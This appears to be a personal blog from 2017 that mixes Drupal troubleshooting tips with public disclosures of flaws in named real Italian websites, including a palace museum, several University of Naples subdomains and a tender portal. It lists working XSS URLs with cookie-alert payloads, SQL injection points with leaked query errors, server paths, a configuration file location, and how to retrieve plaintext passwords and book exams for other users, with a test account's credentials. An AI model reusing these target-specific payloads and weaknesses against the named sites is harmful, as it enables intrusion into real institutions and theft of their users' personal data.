Friday, 15 December 2017

[FIX] Drupal 7 - metatag unsupported operand


run the following sql command (ex.: from phpmyadmin)

TRUNCATE cache_metatag;

Another possible approach is to use drush from the command line

$ drush cc all


On the drupal website there's no answer to the problem but the answer is quite simple.

Friday, 1 December 2017

Reggia di caserta - SQL Injection, system compromise, xss, etc | http://www.reggiadicaserta.beniculturali.it



Joomla 1.5.15 (Vulnerable)

http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/
They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/

path: /var/www/reggiadicaserta

They also have malwares (search in the source code http://www.freepokermoney.net or similar urls):

http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886

Archived page:http://archive.is/3JJsi


Wordpress 4.8.3 (with bogus plugin and theme)

http://www.reggiadicaserta.beniculturali.it/wp/




the wordpress version is the "new" website and they also "devastated" the, already bad (with malwares), seo optimization by not redirecting urls. I feel very sorry for that. What a mess.



Monday, 27 November 2017

http://www.beneventocultura.it | XSS



XSS
http://www.beneventocultura.it/commento.php?Id=%3Cscript%3Ealert(document.cookie);%3C/script%3E

archived xss: http://archive.is/CwZMy

How to fix drupal installation with 32bit php version


Install Drupal on a server with a 32bit version of PHP.


If you want to install drupal on your TEST server even if you have a 32bit version of php

you need to edit:
core/modules/system/system.install

and comment out ( ~line 973):


  if (PHP_INT_SIZE <= 4) {
    $requirements['limited_date_range'] = [
      'title' => t('Limited date range'),
      'value' => t('Your PHP installation has a limited date range.'),
      'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
      'severity' => REQUIREMENT_WARNING,
    ];
  }


It's highly suggested to update to a recent 64bit version of PHP.

Thursday, 23 November 2017

unina.it/ | blind sql injection, xss, data leak, system compromise etc




http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error:http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/


XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E



SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(news_data, '%d/%m/%Y') as data ,news_periodo_desc,news_titolo,news_testo,news_allegato_1,news_allegato_2,tnews_id from tnews where news_id = 62


Joomla! with several vulnerabilities:
http://www.diarc.unina.it/
http://www.ceinge.unina.it
http://www.master-ris.unina.it/
http://www.sicc-it.unina.it

___
http://www.concorsi.unina.it/
Passwords are stored in plain text (not hash) and can be retrieved for all the registered users.

Anybody can register and manipulate other accounts.
(sample fake account)
Codice Fiscale: RDLRLF80A01D247M
Password: RVENDOMIEU
 Nome:    radolfo
Cognome:     radolfo
Data di Nascita:     1/01/1980
Codice Fiscale:     RDLRLF80A01D247M
Password:     RVENDOMIEU
http://www.concorsi.unina.it/dottric/iscrizione/insertUser.jsp

http://www.concorsi.unina.it/dottric/IdentificazioneAmm.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Elenco.jsp
http://www.concorsi.unina.it/dottric/Amministrazione/recuperaPwd.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT131
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT111
http://www.concorsi.unina.it/dottric/visualizzazione/DettagliLingue.jsp?bando=DOTT131


__
http://www.sba.unina.it
uses the Glizy framework
The framework is outdated http://www.minervaeurope.org/structure/workinggroups/userneeds/prototipo/cms/download.html

/admin/index.php
MW/config/config.xml <--- where you can find the configuration data

______
http://www.medicinacds.unina.itI used the previously registered RDLRLF80A01D247M
 and, as suggested from the errors M3900XXXX, a random "matricola" nr M39001234
Anno: 6
Nome:    radolfo
Cognome:     radolfo


We can also force the booking/"prenotazione"  by choosing a different value for "scelta"
sample: http://www.medicinacds.unina.it/ade/rec_scheda.php?scelta=563

When submitting data we can subscribe/book other people, modify the submitted "matricola", get the user data (including password).


There's no need for an authorization/login to check the calendar
http://www.medicinacds.unina.it/ade/ade_calendarioperanno.php
archived:http://archive.is/9ws87



Several other problems on tomcat, outdated stuff and so on. Quite boring...
Note: I haven't modified any record or dumped/saved any confidential information.

Tuesday, 21 November 2017

http://mariorossi.it/ | XSS


http://mariorossi.it/categoria.cfm?cat=15&findcateg=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Friday, 17 November 2017

sefsas.it | sql injection



Sql Injection in the email confirmation url (there are several other):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

full query sample in output

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived:http://archive.is/xDVeh